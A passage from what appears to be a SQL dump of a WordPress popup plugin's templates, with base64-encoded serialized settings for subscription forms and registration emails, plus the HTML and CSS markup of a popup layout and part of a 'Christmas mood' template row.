b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InN1Yl90eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJzdWJfdHh0X3N1Y2Nlc3MiO3M6MjQ6IlRoYW5rIHlvdSBmb3Igc3Vic2NyaWJlISI7czoyMToic3ViX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjIwOiJzdWJfdHh0X2V4aXN0c19lbWFpbCI7czoyMzoiRW1wdHkgIG9yIGludmFsaWQgZW1haWwiO3M6MTY6InN1Yl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHN1YnNjcmlwdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTc6IllvdSBzdWJzY3JpYmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHN1YnNjcmlwdGlvbi4gSWYgeW91IGRpZCBub3Qgc3Vic2NyaWJlIGhlcmUgLSBqdXN0IGlnbm9yZSB0aGlzIG1lc3NhZ2UuIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9zdWJqZWN0IjtzOjM3OiJbc2l0ZW5hbWVdIFlvdXIgdXNlcm5hbWUgYW5kIHBhc3N3b3JkIjtzOjI4OiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfbWVzc2FnZSI7czo2NToiVXNlcm5hbWU6IFt1c2VyX2xvZ2luXTxiciAvPlBhc3N3b3JkOiBbcGFzc3dvcmRdPGJyIC8+W2xvZ2luX3VybF0iO3M6MjU6InN1Yl9yZWRpcmVjdF9lbWFpbF9leGlzdHMiO3M6MDoiIjtzOjEzOiJzdWJfYnRuX2xhYmVsIjtzOjg6IkRPV05MT0FEIjtzOjEzOiJzdWJfbmV3X2VtYWlsIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoxNToic3ViX25ld19zdWJqZWN0IjtzOjI5OiJOZXcgc3Vic2NyaWJlciBmb3IgW3NpdGVuYW1lXSI7czoxNToic3ViX25ld19tZXNzYWdlIjtzOjEyOToiWW91IGhhdmUgbmV3IHN1YnNjcmliZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSBpcyBzdWJzY3JpYmVyIGluZm9ybWF0aW9uOjxiciAvPltzdWJzY3JpYmVyX2RhdGFdIjtzOjg6ImxvZ2luX2J5IjtzOjg6InVzZXJuYW1lIjtzOjE4OiJsb2dpbl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjE1OiJsb2dpbl9idG5fbGFiZWwiO3M6MTA6ItCb0L7Qs9C40L0iO3M6MjM6InJlZ193cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjEzOiJyZWdfYnRuX2xhYmVsIjtzOjg6IlJlZ2lzdGVyIjtzOjEwOiJyZWdfZmllbGRzIjthOjI6e3M6NDoibmFtZSI7YTo3OntzOjM6ImVuYiI7czoxOiIxIjtzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6Njoi0JjQvNGPIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InJlZ190eHRfY29uZmlybV9zZW50IjtzOjE5NToi0KHRgdGL0LvQutCwINC00LvRjyDQv9C+0LTRgtCy0LXRgNC20LTQtdC90LjRjyDQsdGL0Lsg0L7RgtC/0YDQsNCy0LvQtdC90LAg0L3QsCDQstCw0Ygg0LDQtNGA0LXRgSDRjdC70LXQutGC0YDQvtC90L3QvtC5INC/0L7Rh9GC0YsuINCf0YDQvtCy0LXRgNGM0YLQtSDQstCw0YjRgyDRjdC70LXQutGC0YDQvtC90L3Rg9GOINC/0L7Rh9GC0YMhIjtzOjE1OiJyZWdfdHh0X3N1Y2Nlc3MiO3M6NDM6ItCh0L/QsNGB0LjQsdC+INC30LAg0YDQtdCz0LjRgdGC0YDQsNGG0LjRjiEiO3M6MjE6InJlZ190eHRfaW52YWxpZF9lbWFpbCI7czo1ODoi0J/Rg9GB0YLQvtC5INC40LvQuCDQvdC10LTQtdC50YHRgtCy0LjRgtC10LvRjNC90YvQuSBlbWFpbCI7czoxNjoicmVnX3JlZGlyZWN0X3VybCI7czowOiIiO3M6Mjg6InJlZ190eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6NjE6ItCf0L7QtNGC0LLQtdGA0LTQuNGC0LUg0YDQtdCz0LjRgdGC0YDQsNGG0LjRjiDQvdCwIFtzaXRlbmFtZV0iO3M6MjU6InJlZ190eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjMzNDoi0JLRiyDQt9Cw0YDQtdCz0LjRgdGC0YDQuNGA0L7QstCw0L3RiyDQvdCwINGB0LDQudGC0LUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiDQodC70LXQtNGD0LnRgtC1ICA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+INC00LvRjyDQt9Cw0LLQtdGA0YjQtdC90LjRjyDRgNC10LPQuNGB0YLRgNCw0YbQuNC4LiDQldGB0LvQuCDQstGLINC90LUg0LfQsNGA0LXQs9C40YHRgtGA0LjRgNC+0LLQsNC70LjRgdGMINC30LTQtdGB0YwgLSDQv9GA0L7RgdGC0L4g0LjQs9C90L7RgNC40YDRg9C50YLQtSDRjdGC0L4g0YHQvtC+0LHRidC10L3QuNC1LiI7czozMToicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czo0NToiW3NpdGVuYW1lXSAg0JLQsNGIINC70L7Qs9C40L0g0Lgg0L/QsNGA0L7Qu9GMIjtzOjI4OiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czozMToicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfbWVzc2FnZSI7czo3MToi0JvQvtCz0LjQvTogW3VzZXJfbG9naW5dPGJyIC8+0J/QsNGA0L7Qu9GMOiBbcGFzc3dvcmRdPGJyIC8+W2xvZ2luX3VybF0iO3M6MTM6InJlZ19uZXdfZW1haWwiO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjE1OiJyZWdfbmV3X21lc3NhZ2UiO3M6MTc3OiLQoyDQstCw0YEg0L3QvtCy0YvQuSDQv9C+0LvRjNC30L7QstCw0YLQtdC70Ywg0L3QsCDRgdCw0LnRgtC1IDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwg0LLQvtGCINC40L3RhNC+0YDQvNCw0YbQuNGPINC/0L7Qu9GM0LfQvtCy0LDRgtC10LvRjzogPGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6MTI6ImNvbnRhY3RfZm9ybSI7czoyOiIyMCI7czoxMjoic3RhdF9nYV9jb2RlIjtzOjA6IiI7czo1OiJ0eHRfMCI7czoxNjoiPHA+RlJFRSBESUVUPC9wPiI7czo1OiJ0eHRfMSI7czoxNjoiPHA+TUVBTCBQTEFOPC9wPiI7czo1OiJ0eHRfMiI7czo0MjoiPHA+TG93LUNhcnAgUmVjaXBlcyBZb3XigJlsbCBGYWxsIEZvciE8L3A+Ijt9czoxMDoib3B0c19hdHRycyI7YToyOntzOjk6ImJnX251bWJlciI7czoxOiI0IjtzOjE2OiJ0eHRfYmxvY2tfbnVtYmVyIjtzOjE6IjMiO319','<link href=\"https://fonts.google.com/?query=Open+sans&selection.family=Open+Sans:400,700\" rel=\"stylesheet\">\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			<div class=\"ppsTopBgWrapper\">\r\n				<div class=\"ppsWrapImgWr\">\r\n					[if enb_label]\r\n						<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n					[endif]\r\n					[if enb_txt_0]\r\n						<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n						[txt_0]\r\n						</div>\r\n					[endif]\r\n					[if enb_txt_1]\r\n						<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_1 ppsPopupTxt_1\">\r\n						[txt_1]\r\n						</div>\r\n					[endif]\r\n				</div>\r\n			</div>\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsBtmBgWrapper\">\r\n				[if enb_txt_2]\r\n					<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_2 ppsPopupTxt_2\">\r\n					[txt_2]\r\n					</div>\r\n				[endif]\r\n				[if enb_subscribe]\r\n					<div class=\"ppsSubscribeShell\">\r\n						[sub_form_start]\r\n						[sub_fields_html]\r\n						<input class=\"butt\" type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n						[if enb_foot_note]\r\n							<a href=\"#\" class=\"ppsFootNote ppsPopupClose\">\r\n							[foot_note]\r\n							</a>\r\n						[endif]\r\n						[sub_form_end]\r\n						<div style=\"clear: both;\"></div>\r\n					</div>\r\n				[endif]\r\n				<div style=\"clear: both;\"></div>\r\n				[if enb_sm]\r\n					<div style=\"clear: both;\"></div>\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n					\r\n				[endif]\r\n			</div>\r\n			<div class=\"ppsBtmLine\"></div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	font-family: \"Open Sans\", arial;\r\n	font-size: 13px;\r\n	line-height: normal;\r\n	font-weight: normal;\r\n	color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n	[if bg_type_0 == \"color\"]\r\n	background-color: [bg_color_0];\r\n  	[elseif bg_type_0 == \"img\"]\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n	\r\n	position: relative;\r\n	text-align: center;\r\n	padding: 0;\r\n}\r\n/*For all Elements*/\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"email\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"text\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	margin: 10px 0 0;\r\n	font-size: 16px;\r\n	font-family: \"Open Sans\", arial;\r\n	-webkit-border-radius: 5px;\r\n	-moz-border-radius: 5px;\r\n	border-radius: 5px;\r\n	border: 2px solid #ccc;\r\n	width: 100%;\r\n	display:block;\r\n	background: #fff;\r\n	color: #4f4f4f;\r\n	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeForm input:first-child {\r\n	margin-top: 0px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select  {\r\n	font-size: 16px;\r\n	font-family: \"Open Sans\", arial;\r\n	border: 2px solid #ccc;\r\n	display: inline-block;\r\n	background: #fff;\r\n	color: #4f4f4f;\r\n	text-align: center;\r\n	height: 45px;\r\n	-webkit-border-radius: 5px;\r\n	-moz-border-radius: 5px;\r\n	border-radius: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  span {\r\n	display: inline-block;\r\n	padding-right: 2px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  {\r\n	color: #333333;\r\n    display: block;\r\n    margin: 10px 0 0;\r\n	font-size: 16px;\r\n	font-family: \"Open Sans\", arial;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email] {\r\n    height: 45px;\r\n}\r\n#ppsPopupShell_[ID] input[type=submit] {\r\n	font-family: \"Open Sans\", arial;\r\n	display:inline-block;\r\n  	color: #fff;\r\n    font-size: 18px;\r\n	width: auto;\r\n	margin: 10px 0;\r\n	-webkit-border-radius: 35px;\r\n	-moz-border-radius: 35px;\r\n	border-radius: 35px;\r\n	border: 0 solid transparent;\r\n  	cursor: pointer;\r\n	text-transform: none;\r\n	padding: 13px 88px 7px 60px;\r\n	font-weight: 700;\r\n	text-shadow: 1px 2px 0px #86B80E;\r\n	text-decoration: none;text-decoration: none;\r\n	\r\n	-webkit-box-shadow: 1px 4px 0 0 rgba(134, 184, 14, 1);\r\n	-moz-box-shadow: 1px 4px 0 0 rgba(134, 184, 14, 1);\r\n	box-shadow: 1px 4px 0 0 rgba(134, 184, 14, 1);\r\n\r\n	background-color: #9cd610;\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/365-1-arr-dwn.png\");\r\n    background-position: 79% 13px;\r\n    background-repeat: no-repeat;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input.butt + a.ppsPopupClose {\r\n	display: inline-block !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell {\r\n    display: inline-block;\r\n    margin: 20px 0 20px;\r\n    width: 60%;\r\n	position: relative;\r\n	z-index: 100;\r\n}\r\n#ppsPopupShell_[ID] .ppsTopBgWrapper {\r\n	[if bg_type_1 == \"color\"]\r\n	background: [bg_color_1];\r\n  	[elseif bg_type_1 == \"img\"]\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n	\r\n	padding: 70px 0 0;\r\n	position: relative;\r\n}\r\n#ppsPopupShell_[ID] .ppsWrapImgWr {\r\n	[if bg_type_2 == \"color\"]\r\n	background: {{ hex_to_rgba_str(popup.params.tpl.bg_color_2, 0.5) }};\r\n  	[elseif bg_type_2 == \"img\"]\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n	\r\n	display: inline-block;\r\n    min-height: 130px;\r\n    padding: 10px 0;\r\n    text-align: center;\r\n    width: 100%;\r\n}\r\n#ppsPopupShell_[ID] .ppsImgWr {\r\n	display: inline-block;\r\n	max-width: 100%;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	font-size: 50px;\r\n	position: relative;\r\n	z-index: 100;\r\n	width: 90%;\r\n	display: inline-block;\r\n	padding-top: 30px;\r\n	font-family: \"Open Sans\", arial;\r\n	word-wrap: break-word;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt {\r\n	margin: 0;\r\n	padding: 0;\r\n	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt p {\r\n	display: inline-block;\r\n    margin: 0;\r\n    padding: 0;\r\n    width: 90%;\r\n	position: relative;\r\n	z-index: 100;\r\n	word-wrap: break-word;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n    font-size: 63px;\r\n    font-weight: bold;\r\n	font-family: \"Open Sans\", arial;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_1 {\r\n    color: #ffb2b2;\r\n    font-size: 56px;\r\n    font-weight: bold;\r\n    line-height: 51px;\r\n	font-family: \"Open Sans\", arial;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_2 {\r\n    color: #333333;\r\n    font-size: 21px;\r\n    font-weight: bold;\r\n	font-family: \"Open Sans\", arial;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsBtmBgWrapper {\r\n	padding: 20px 0 0;\r\n	position: relative;\r\n}\r\n#ppsPopupShell_[ID] .ppsBtnOne:hover {\r\n	text-decoration: none;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsBtmLine {\r\n	height: 5px;\r\n	\r\n	[if bg_type_3 == \"color\"]\r\n	background: {{ hex_to_rgba_str(popup.params.tpl.bg_color_3, 0.5) }} !important;\r\n  	[elseif bg_type_3 == \"img\"]\r\n  	background-image: url(\"[bg_img_3]\") !important;\r\n  	background-repeat: no-repeat !important; \r\n  	background-size: cover !important;\r\n  	[endif]\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n	z-index: 1000;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote {\r\n	border-bottom: 2px dotted #b7b7b7;\r\n    color: #b7b7b7;\r\n	display: none !important;\r\n	margin: 10px 0;\r\n	text-decoration: none;	\r\n	background: none !important;\r\n	font-size: 16px;\r\n    height: auto !important;\r\n    position: static !important;\r\n    width: auto !important;\r\n	top: 0 !important;\r\n	word-wrap: break-word;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote:hover {\r\n	text-decoration: none;\r\n}\r\n#ppsPopupShell_[ID] .ppsSm{\r\n	margin-top:20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubMsg{\r\n	clear: both;\r\n  	text-align: center;\r\n}','christmas-1-prev.png',1,1,1,11,0,0,0,'2015-01-10 17:59:43',47,0),(48,'Christmas mood',1,0,'YTozOntzOjQ6Im1haW4iO2E6MzA6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjtzOjI0OiJoaWRlX2Zvcl91c2VyX3JvbGVzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjExODp7czo1OiJ3aWR0aCI7czozOiI1MDAiO3M6MTM6IndpZHRoX21lYXN1cmUiO3M6MjoicHgiO3M6MTg6ImJnX292ZXJsYXlfb3BhY2l0eSI7czozOiIwLjUiO3M6MTU6ImJnX292ZXJsYXlfdHlwZSI7czo1OiJjb2xvciI7czoxNjoiYmdfb3ZlcmxheV9jb2xvciI7czo0OiIjMDAwIjtzOjE0OiJiZ19vdmVybGF5X2ltZyI7czowOiIiO3M6MTg6ImJnX292ZXJsYXlfaW1nX3BvcyI7czo3OiJzdHJldGNoIjtzOjk6ImJnX3R5cGVfMCI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMCI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiI2ZmZmZmZiI7czo5OiJiZ190eXBlXzEiO3M6MzoiaW1nIjtzOjg6ImJnX2ltZ18xIjtzOjQ0OiJbUFBTX0FTU0VUU19VUkxdaW1nL2Fzc2V0cy8zNjUtMi10b3AtaW1nLnBuZyI7czoxMDoiYmdfY29sb3JfMSI7czo3OiIjZmZmZmZmIjtzOjk6ImJnX3R5cGVfMiI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMiI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzIiO3M6NzoiI2Y0ZjRmNCI7czo5OiJiZ190eXBlXzMiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzMiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8zIjtzOjc6IiNlZjI4MjEiO3M6MTA6ImZvbnRfbGFiZWwiO3M6NzoiZGVmYXVsdCI7czoxNjoibGFiZWxfZm9udF9jb2xvciI7czo3OiIjMzMzMzMzIjtzOjEwOiJmb250X3R4dF8wIjtzOjc6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8wIjtzOjc6IiNmMjM2MmQiO3M6MTA6ImZvbnRfdHh0XzEiO3M6NzoiZGVmYXVsdCI7czoxNzoidGV4dF9mb250X2NvbG9yXzEiO3M6NzoiIzMzMzMzMyI7czoxMDoiZm9udF90eHRfMiI7czo3OiJkZWZhdWx0IjtzOjE3OiJ0ZXh0X2ZvbnRfY29sb3JfMiI7czo3OiIjMzMzMzMzIjtzOjExOiJmb250X2Zvb3RlciI7czo3OiJkZWZhdWx0IjtzOjE3OiJmb290ZXJfZm9udF9jb2xvciI7czo3OiIjMDE2ODIzIjtzOjE3OiJyZWlkcmVjdF9vbl9jbG9zZSI7czowOiIiO3M6OToiY2xvc2VfYnRuIjtzOjk6InJlZF9jbG9zZSI7czo3OiJidWxsZXRzIjtzOjg6InBvcF9pY29uIjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6OToiZW5iX2xhYmVsIjtzOjE6IjEiO3M6NToibGFiZWwiO3M6MTA6IlNhdmUgdXAgdG8iO3M6OToiZW5iX3R4dF8wIjtzOjE6IjEiO3M6OToiZW5iX3R4dF8xIjtzOjE6IjEiO3M6OToiZW5iX3R4dF8yIjtzOjE6IjEiO3M6MTM6ImVuYl9mb290X25vdGUiO3M6MToiMSI7czo5OiJmb290X25vdGUiO3M6Mjg6IkNvdW50aW51ZSB3aXRob3V0IDUwJSBjb3Vwb24iO3M6MTU6ImVuYl9zbV9mYWNlYm9vayI7czoxOiIxIjtzOjE3OiJlbmJfc21fZ29vZ2xlcGx1cyI7czoxOiIxIjtzOjE0OiJlbmJfc21fdHdpdHRlciI7czoxOiIxIjtzOjk6InNtX2Rlc2lnbiI7czo0OiJib3h5IjtzOjg6ImFuaW1fa2V5IjtzOjEwOiJzbGlkZV9kb3duIjtzOjEzOiJhbmltX2R1cmF0aW9uIjtzOjA6IiI7czoxMzoiZW5iX3N1YnNjcmliZSI7czoxOiIxIjtzOjg6InN1Yl9kZXN0IjtzOjk6IndvcmRwcmVzcyI7czoyMzoic3ViX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTk6InN1Yl9hd2ViZXJfbGlzdG5hbWUiO3M6MDoiIjtzOjIxOiJzdWJfYXdlYmVyX2FkdHJhY2tpbmciO3M6MDoiIjtzOjIxOiJzdWJfbWFpbGNoaW1wX2FwaV9rZXkiO3M6MDoiIjtzOjI1OiJzdWJfbWFpbGNoaW1wX2dyb3Vwc19mdWxsIjtzOjA6IiI7czoxNDoic3ViX2dyX2FwaV9rZXkiO3M6MDoiIjtzOjE2OiJzdWJfZ3JfY3ljbGVfZGF5IjtzOjE6IjAiO3M6MTM6InN1Yl9pY19hcHBfaWQiO3M6MDoiIjtzOjE1OiJzdWJfaWNfYXBwX3VzZXIiO3M6MDoiIjtzOjE1OiJzdWJfaWNfYXBwX3Bhc3MiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX3VybCI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfa2V5IjtzOjA6IiI7czoxODoic3ViX2FyX2Zvcm1fYWN0aW9uIjtzOjA6IiI7czoxMDoic3ViX3NnYV9pZCI7czowOiIiO3M6MTU6InN1Yl9zZ2FfbGlzdF9pZCI7czowOiIiO3M6MjE6InN1Yl9zZ2FfYWN0aXZhdGVfY29kZSI7czowOiIiO3M6MTM6InN1Yl9zZl9hcHBfaWQiO3M6MDoiIjtzOjE0OiJzdWJfY2tfYXBpX2tleSI7czowOiIiO3M6MTQ6InN1Yl9tZW1fYWNjX2lkIjtzOjA6IiI7czoxNToic3ViX21lbV9wdWRfa2V5IjtzOjA6IiI7czoxNjoic3ViX21lbV9wcml2X2tleSI7czowOiIiO3M6MTQ6InN1Yl9zYl9hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX3Y2X2FwaV9rZXkiO3M6MDoiIjtzOjEyOiJzdWJfdnRpZ191cmwiO3M6MDoiIjtzOjEzOiJzdWJfdnRpZ19uYW1lIjtzOjA6IiI7czoxMjoic3ViX3Z0aWdfa2V5IjtzOjA6IiI7czoxNjoic3ViX3ltbHBfYXBpX2tleSI7czowOiIiO3M6MTM6InN1Yl95bWxwX25hbWUiO3M6MDoiIjtzOjExOiJzdWJfNGRfbmFtZSI7czowOiIiO3M6MTE6InN1Yl80ZF9wYXNzIjtzOjA6IiI7czoxMDoic3ViX2ZpZWxkcyI7YTo2OntzOjQ6Im5hbWUiO2E6Njp7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjQ6Ik5hbWUiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjExOiJZb3VyIGUtbWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5iIjtzOjE6IjEiO31pOjExO2E6Nzp7czozOiJlbmIiO3M6MToiMSI7czo0OiJuYW1lIjtzOjI6IjExIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czoyOiIxMSI7czo1OiJ2Y